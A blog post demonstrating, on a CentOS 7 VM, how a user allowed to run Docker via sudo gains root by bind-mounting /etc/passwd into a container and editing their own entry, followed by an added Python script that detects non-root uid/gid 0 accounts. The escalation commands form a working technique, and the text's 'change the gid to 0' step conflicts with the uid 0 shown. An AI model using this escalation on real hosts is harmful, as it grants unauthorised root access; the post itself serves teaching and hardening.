In my previous post I mentioned that I am learning about Podman, a tool for running containers that does not require a daemon process (like the Docker daemon) or root privileges.
In this post I would like to demonstrate why running containers with root privileges could be dangerous.
For my demonstration, I have a CentOS 7 host running on VirtualBox. I have installed Docker and started the Docker daemon via the following steps:
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum install docker-ce
sudo systemctl start docker
Next, I will create a new user, Bob Billiards:
sudo useradd -u 8888 -c "Bob Billiards" bbilliar
I will let Bob run the docker command via sudo:
sudo visudo -f /etc/sudoers.d/docker
Test 1 – Confirm user is able to run Docker via sudo
[bbilliar@centos7 ~]$ sudo docker run --rm -it alpine sh
/ #
Bob is able to run Docker via sudo, as expected.
Test 2 – Publish a privileged port
This time, Bob is going to publish port 80, a privileged port. This may be unexpected for an ordinary user, but it works because the Docker daemon runs with root privileges:
[bbilliar@centos7 ~]$ sudo docker run --rm -it -p 80:80 alpine sh
/ #
To test that it is really bound to port 80, I started netcat listening on port 80 in the container:
/ # nc -l -p 80
Then I ran curl from the host:
[bbilliar@centos7 ~]$ curl localhost
The request headers appeared in the container, as expected:
GET / HTTP/1.1
User-Agent: curl/7.29.0
Host: localhost
Accept: */*
Test 3 – Share a volume and gain root access
This time, Bob is going to share volumes between the host and the container; specifically, he is going to mount the host's /etc/passwd file as /etc/passwd inside the container:
[bbilliar@centos7 ~]$ sudo docker run --rm -it --volume /etc/passwd:/etc/passwd alpine sh
/ #
From here, edit /etc/passwd and change the user's gid to 0.
Exit the container.
View user bbilliar's /etc/passwd entry on the host:
[bbilliar@centos7 ~]$ grep bbilliar /etc/passwd
bbilliar:x:0:0::/home/bbilliar:/bin/bash
Log out, and log back in as the same user:
Using username "bbilliar".
firstname.lastname@example.org's password:
Last login: Mon Dec 31 13:38:57 2018 from 10.0.2.2
[root@centos7 ~]#
Bob is now root! This may not be what the administrator expected when giving Bob sudo privileges to run Docker.
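A defender-side check for the outcome of Test 3, as an added example that is not part of the original post: it parses passwd(5) records and reports any account other than root that carries uid 0 or gid 0, which is exactly the change made to bbilliar's entry above. The sample passwd text is constructed; the bbilliar line mirrors the grep output shown in the post.

```python
#!/usr/bin/env python3
"""Audit passwd(5) data for non-root accounts that hold uid 0 or gid 0.

Added example, not from the original post. SAMPLE_PASSWD is constructed;
its bbilliar line matches the tampered entry shown in Test 3.
"""
from dataclasses import dataclass
from typing import List


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd text. Blank lines, comments and malformed records are skipped."""
    entries: List[PasswdEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # not a well-formed 7-field passwd record
        name, _pw, uid, gid, _gecos, home, shell = fields
        try:
            entries.append(PasswdEntry(name, int(uid), int(gid), home, shell))
        except ValueError:
            continue  # non-numeric uid or gid; skip rather than guess
    return entries


def find_rogue_superusers(entries: List[PasswdEntry]) -> List[str]:
    """Return names of accounts other than 'root' with uid 0 or gid 0."""
    return [e.name for e in entries
            if e.name != "root" and (e.uid == 0 or e.gid == 0)]


# Constructed sample: normal root and user entries plus the edited bbilliar line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bbilliar:x:0:0::/home/bbilliar:/bin/bash
"""

if __name__ == "__main__":
    for name in find_rogue_superusers(parse_passwd(SAMPLE_PASSWD)):
        print(f"WARNING: non-root account with superuser id: {name}")
```

To run it against a live host, feed the check the contents of /etc/passwd instead of SAMPLE_PASSWD; the same check belongs in a file-integrity or configuration-audit job, since a bind mount of /etc/passwd leaves no trace inside the container.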